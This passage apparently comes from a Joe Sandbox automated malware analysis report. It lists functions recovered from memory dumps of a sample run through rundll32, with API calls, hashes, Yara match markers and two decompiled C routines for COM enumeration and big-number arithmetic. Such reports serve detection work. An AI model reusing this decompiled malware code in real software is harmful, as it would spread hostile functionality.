                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 0580F9ED
                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 0580F9F6
                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,05807779,?,?,00000040), ref: 0580FA14
                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,05807779,?,?,00000040), ref: 0580FA21
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 3667519916-0
                                            • Opcode ID: ebd3de1471774a9b07677440eaf68017cd267c4a8f2cac3eb73d735266f9f74c
                                            • Instruction ID: 3255271c0b8180bcadb1329fa177a922a499a440b51c26f53120408416efacd6
                                            • Opcode Fuzzy Hash: ebd3de1471774a9b07677440eaf68017cd267c4a8f2cac3eb73d735266f9f74c
                                            • Instruction Fuzzy Hash: 34F03031204704AFEBB06B65EC48F1ABAACFF44255F119619FD42D25E0DF24EC45CA35
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F857 Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0581F87B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • wsprintfA.USER32 ref: 0581F8AC
                                              • Part of subcall function 0580B175: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,05812B68), ref: 0580B18B
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B1B3
                                              • Part of subcall function 0580B175: lstrlen.KERNEL32(?), ref: 0580B1C2
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B202
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B237
                                              • Part of subcall function 0580B175: memcpy.NTDLL(00000000,?,?), ref: 0580B244
                                              • Part of subcall function 0580B175: memcpy.NTDLL(00000008,058243E8,00000002,00000000,?,?), ref: 0580B259
                                              • Part of subcall function 0580B175: wsprintfA.USER32 ref: 0580B27C
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0581F921
                                              • Part of subcall function 0582240D: RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05822423
                                              • Part of subcall function 0582240D: RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0582243E
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 0581F90B
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0581F917
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                            • String ID:
                                            • API String ID: 3553201432-0
                                            • Opcode ID: 229c2ee34e43ae6074c2fe67e24c548eacabbd40c38b9da721d95f9f99319ad2
                                            • Instruction ID: fd0311cf0b41f2316423c51432e9d358e0f9656ffa7d95bb2eee77ac58a4fcfd
                                            • Opcode Fuzzy Hash: 229c2ee34e43ae6074c2fe67e24c548eacabbd40c38b9da721d95f9f99319ad2
                                            • Instruction Fuzzy Hash: F421D7B6900249BFCF11EFA5ED49CDF7FB9FB48310B008416FE1696110D671AA64DB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581F372 Relevance: 6.3, APIs: 5, Instructions: 76memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3CF
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3E0
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F3F8
                                            • CloseHandle.KERNEL32(?), ref: 0581F412
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581F427
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap$CloseHandle
                                            • String ID:
                                            • API String ID: 1910495013-0
                                            • Opcode ID: 78c4734ab05bbc90f6b0f70d742d913fc39977c229a804ce507e86753bba2aa3
                                            • Instruction ID: 1f21063910dc330cde4f97c402c14af2756f30437b105ae3e64637ce78efbdc5
                                            • Opcode Fuzzy Hash: 78c4734ab05bbc90f6b0f70d742d913fc39977c229a804ce507e86753bba2aa3
                                            • Instruction Fuzzy Hash: 5B21E871605521AFD6219B65EC8886AFB6AFF48B107548514FD0AD3610CB31FCA1CBE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058030BA Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05806778: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 05806793
                                              • Part of subcall function 05806778: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 058067E1
                                              • Part of subcall function 05806778: GetProcAddress.KERNEL32(00000000,?), ref: 058067FA
                                              • Part of subcall function 05806778: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0580684B
                                            • GetLastError.KERNEL32(?,?,?), ref: 05803248
                                            • FreeLibrary.KERNEL32(?,?,?), ref: 058032B0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                            • String ID:
                                            • API String ID: 1730969706-0
                                            • Opcode ID: 9849445a0e853ec27f27f0131abafae15e618ac3d954ddef4903c871d2cef28e
                                            • Instruction ID: 9ffb6758f161ccc33aa3a5e936af6f0de17249c042fa6a5c6151632a05b4c529
                                            • Opcode Fuzzy Hash: 9849445a0e853ec27f27f0131abafae15e618ac3d954ddef4903c871d2cef28e
                                            • Instruction Fuzzy Hash: A571C575E00209EFCF50DFE5C9889ADBBB9BF48305B109969E916E7290DB31AD41CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F3394 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SysAllocString.OLEAUT32(?), ref: 049F33CF
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F34B4
                                              • Part of subcall function 049F5D8F: SysAllocString.OLEAUT32(049F9290), ref: 049F5DDF
                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 049F3507
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3516
                                              • Part of subcall function 049F3FDD: Sleep.KERNEL32(000001F4), ref: 049F4025
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                            • String ID:
                                            • API String ID: 3193056040-0
                                            • Opcode ID: 95dd0be7b251a67c4cd4becfb733f16bc066415fce2ef02777d28456f178856c
                                            • Instruction ID: cdfc0880fd0dac8fcb3a99842d2898f3c6322a5a4a31064b5060df7d3badf2ef
                                            • Opcode Fuzzy Hash: 95dd0be7b251a67c4cd4becfb733f16bc066415fce2ef02777d28456f178856c
                                            • Instruction Fuzzy Hash: 2B514D75500609AFDB12CFA8D844A9EB7BAFFC8700B188439EA05DB220DB79ED45CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F5D8F Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 46%
                                            			E049F5D8F(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x49fa348; // 0x57d5a8
					_t5 = _t103 + 0x49fb038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x49f9290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x49fa348; // 0x57d5a8
												_t28 = _t109 + 0x49fb0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x49fa348; // 0x57d5a8
														_t33 = _t79 + 0x49fb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                            0x049f5d94
                                            0x049f5d9d
                                            0x049f5d9e
                                            0x049f5da2
                                            0x049f5da8
                                            0x049f5dae
                                            0x049f5db7
                                            0x049f5dbd
                                            0x049f5dc7
                                            0x049f5dc9
                                            0x049f5dcf
                                            0x049f5dd4
                                            0x049f5ddf
                                            0x049f5de5
                                            0x049f5dea
                                            0x049f5f0c
                                            0x049f5df0
                                            0x049f5df0
                                            0x049f5dfd
                                            0x049f5e03
                                            0x049f5e09
                                            0x049f5e0d
                                            0x049f5e13
                                            0x049f5e20
                                            0x049f5e24
                                            0x049f5e2a
                                            0x049f5e2d
                                            0x049f5e35
                                            0x049f5e36
                                            0x049f5e3a
                                            0x049f5e3e
                                            0x049f5e41
                                            0x049f5e44
                                            0x049f5e4a
                                            0x049f5e53
                                            0x049f5e59
                                            0x049f5e5a
                                            0x049f5e5d
                                            0x049f5e5e
                                            0x049f5e5f
                                            0x049f5e67
                                            0x049f5e68
                                            0x049f5e69
                                            0x049f5e6b
                                            0x049f5e6f
                                            0x049f5e73
                                            0x00000000
                                            0x00000000
                                            0x049f5e79
                                            0x049f5e82
                                            0x049f5e88
                                            0x049f5e92
                                            0x049f5e96
                                            0x049f5e98
                                            0x049f5ea5
                                            0x049f5ea9
                                            0x049f5eb1
                                            0x049f5eb6
                                            0x049f5ec8
                                            0x049f5eca
                                            0x049f5ed0
                                            0x049f5ed0
                                            0x049f5ed9
                                            0x049f5ed9
                                            0x049f5edb
                                            0x049f5ee1
                                            0x049f5ee1
                                            0x049f5ee4
                                            0x049f5eea
                                            0x049f5eed
                                            0x049f5ef6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f5ef6
                                            0x049f5e4a
                                            0x049f5e44
                                            0x049f5e2d
                                            0x049f5efc
                                            0x049f5efc
                                            0x049f5f02
                                            0x049f5f02
                                            0x049f5f08
                                            0x049f5f08
                                            0x049f5f11
                                            0x049f5f17
                                            0x049f5f17
                                            0x049f5dd4
                                            0x049f5f20

                                            APIs
                                            • SysAllocString.OLEAUT32(049F9290), ref: 049F5DDF
                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 049F5EC0
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F5ED9
                                            • SysFreeString.OLEAUT32(?), ref: 049F5F08
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$Free$Alloclstrcmp
                                            • String ID:
                                            • API String ID: 1885612795-0
                                            • Opcode ID: 3211b8e9c60bf01e80847360493731d711f699f3ec55d3cf906b25dcc99d60a3
                                            • Instruction ID: 719dc589eee52a79aeac25752b2265185cde37b0a87e408a4da203d2c38fad24
                                            • Opcode Fuzzy Hash: 3211b8e9c60bf01e80847360493731d711f699f3ec55d3cf906b25dcc99d60a3
                                            • Instruction Fuzzy Hash: 56513D75D00519EFCB00DFA8C888DAEB7B9FF88710B2585A5E915EB211D771AD41CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05822885 Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,00000008,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?), ref: 05822891
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • ResetEvent.KERNEL32(?,?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9), ref: 05822908
                                            • GetLastError.KERNEL32(?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 05822935
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • GetLastError.KERNEL32(?,?,?,0581C0C1,00000000,0000EA60,00000000,00000000,00000000,?,0581A6B6,?,?,00000000,0580D3E9,?), ref: 058229F7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                            • String ID:
                                            • API String ID: 943265810-0
                                            • Opcode ID: a06d571e6b7997d6405c0564fad723aa687f28a403603730fc7ab797c2cebd4e
                                            • Instruction ID: 11208f48985e2696a08ab647f315766aa4f3551aca7cab3fd6255ee387b9a015
                                            • Opcode Fuzzy Hash: a06d571e6b7997d6405c0564fad723aa687f28a403603730fc7ab797c2cebd4e
                                            • Instruction Fuzzy Hash: C4414DB6610215BFDB209FA4CC89EAB7EADFB04704F044A29FD53D6590DB71ED849A20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F35A2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E049F35A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E049F13E0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E049F7099(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E049F381E(_t101,  &_v428, _a8, _t96 - _t81);
					E049F381E(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E049F7099(_t101, 0x49fa1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E049F7099(_a16, _a4);
						E049F4191(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L049F81CA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L049F81C4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E049F3ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E049F40E5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E049F5908(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x49fa1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                            0x049f35a5
                                            0x049f35b1
                                            0x049f35b7
                                            0x049f35bc
                                            0x049f35c0
                                            0x049f3732
                                            0x049f3736
                                            0x049f3736
                                            0x049f35c6
                                            0x049f35ca
                                            0x049f35ce
                                            0x049f35d1
                                            0x049f35dc
                                            0x049f35e2
                                            0x049f35e7
                                            0x049f35ea
                                            0x049f3604
                                            0x049f3613
                                            0x049f361f
                                            0x049f3629
                                            0x049f362e
                                            0x049f3630
                                            0x049f3633
                                            0x049f36ea
                                            0x049f36f0
                                            0x049f3701
                                            0x049f3714
                                            0x049f372a
                                            0x00000000
                                            0x049f372f
                                            0x049f363c
                                            0x049f3643
                                            0x049f3647
                                            0x049f364d
                                            0x049f364f
                                            0x049f3651
                                            0x049f3653
                                            0x049f3655
                                            0x049f365f
                                            0x049f3664
                                            0x049f3666
                                            0x049f3668
                                            0x049f3669
                                            0x049f366a
                                            0x049f366b
                                            0x049f3672
                                            0x049f3679
                                            0x049f367c
                                            0x049f367c
                                            0x049f3649
                                            0x049f3649
                                            0x049f3649
                                            0x049f3684
                                            0x049f368c
                                            0x049f3698
                                            0x049f369d
                                            0x049f369d
                                            0x049f36a2
                                            0x00000000
                                            0x00000000
                                            0x049f36a4
                                            0x049f36a7
                                            0x049f36b4
                                            0x00000000
                                            0x00000000
                                            0x049f36b6
                                            0x049f36b6
                                            0x049f36c3
                                            0x049f369d
                                            0x049f36a2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f36a2
                                            0x049f36cd
                                            0x049f36d0
                                            0x049f36d3
                                            0x049f36da
                                            0x049f36da
                                            0x049f36e7
                                            0x00000000
                                            0x049f36e7
                                            0x049f35d3
                                            0x049f35d7
                                            0x049f35d8
                                            0x049f35da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f35da
                                            0x00000000

                                            APIs
                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 049F3655
                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 049F366B
                                            • memset.NTDLL ref: 049F3714
                                            • memset.NTDLL ref: 049F372A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memset$_allmul_aulldiv
                                            • String ID:
                                            • API String ID: 3041852380-0
                                            • Opcode ID: e76886fcf6c5f9bffccc551179ccb61fff3b59b4956127c7aafa6f41314ef0ef
                                            • Instruction ID: 954306416d528e0f206fb0da2ca837a4571c6f00058091e866b23fe9d871f35c
                                            • Opcode Fuzzy Hash: e76886fcf6c5f9bffccc551179ccb61fff3b59b4956127c7aafa6f41314ef0ef
                                            • Instruction Fuzzy Hash: 6E41A071B00219AFEB209E68CC81BEE7779EF85314F104579FE19A7280DB74BE558B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05817073 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                            Download Yara Rule
                                            APIs
                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 05817126
                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0581713C
                                            • memset.NTDLL ref: 058171E5
                                            • memset.NTDLL ref: 058171FB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memset$_allmul_aulldiv
                                            • String ID:
                                            • API String ID: 3041852380-0
                                            • Opcode ID: c49a0f318c282d35742b1709aabc06419a9846a1e6bea84fa3ac57cd705e165e
                                            • Instruction ID: 8484d2410e601bba4b9ae39d78d2e941548635d897910f839f648a8e968be121
                                            • Opcode Fuzzy Hash: c49a0f318c282d35742b1709aabc06419a9846a1e6bea84fa3ac57cd705e165e
                                            • Instruction Fuzzy Hash: 61419D71B00219ABDB20EF6CDC44BEE7769EF45710F004569FD1AEB280DB70AE448B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807F90 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 05807FAA
                                            • StrChrA.SHLWAPI(?,0000005C), ref: 05807FD1
                                            • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 05807FF7
                                            • lstrcpy.KERNEL32(?,?), ref: 0580809B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpylstrcpyn
                                            • String ID:
                                            • API String ID: 4154805583-0
                                            • Opcode ID: 7817f710975373b806319f5dc8c4d1fc97b99e819f40af34e89c7d201a4e4359
                                            • Instruction ID: 0d80da3a61896616f843fee73bf7264d5dcabdf75bd23e3f37239204dba7bb35
                                            • Opcode Fuzzy Hash: 7817f710975373b806319f5dc8c4d1fc97b99e819f40af34e89c7d201a4e4359
                                            • Instruction Fuzzy Hash: 81414A76910219AFDB519BA4CD88DEE7FBCFB08250F0484A6F905E3180DA34AE48CF60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580DF40 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strupr
                                            • String ID:
                                            • API String ID: 3408778250-0
                                            • Opcode ID: e8c21fd9941afc54d1623a5be6ae26d920e527db24a6efd8da56f4ccfc2b187f
                                            • Instruction ID: 21d7be087e5102f53b10a9c04b8a9b842214876a5224c7ecb1d89b49f74624c1
                                            • Opcode Fuzzy Hash: e8c21fd9941afc54d1623a5be6ae26d920e527db24a6efd8da56f4ccfc2b187f
                                            • Instruction Fuzzy Hash: 0B412C71901319AFDF60DFA8DC88AAEBBA9BF44350F148816EC15D6051D778E885CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058053AD Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                            Download Yara Rule
                                            APIs
                                            • ResetEvent.KERNEL32(?), ref: 058053C3
                                            • GetLastError.KERNEL32 ref: 058053DC
                                              • Part of subcall function 0580E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05822953,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000), ref: 0580E564
                                            • ResetEvent.KERNEL32(?), ref: 05805455
                                            • GetLastError.KERNEL32 ref: 05805470
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorEventLastReset$MultipleObjectsWait
                                            • String ID:
                                            • API String ID: 2394032930-0
                                            • Opcode ID: 2bb99d669ee9f68266e092850f40887ee16027e30d77de26881023cb286502e1
                                            • Instruction ID: 5aae9c5c1e940cffcc6f0e6bb5fa2e7eae89c0070a9d7d4bf084b050c5f10ad3
                                            • Opcode Fuzzy Hash: 2bb99d669ee9f68266e092850f40887ee16027e30d77de26881023cb286502e1
                                            • Instruction Fuzzy Hash: C831D572600A04ABCBE19BA4CC44EAE7BBAFF84262F255564FD15D31D0EB70ED418F20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581CF4E Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON
                                            Download Yara Rule
                                            APIs
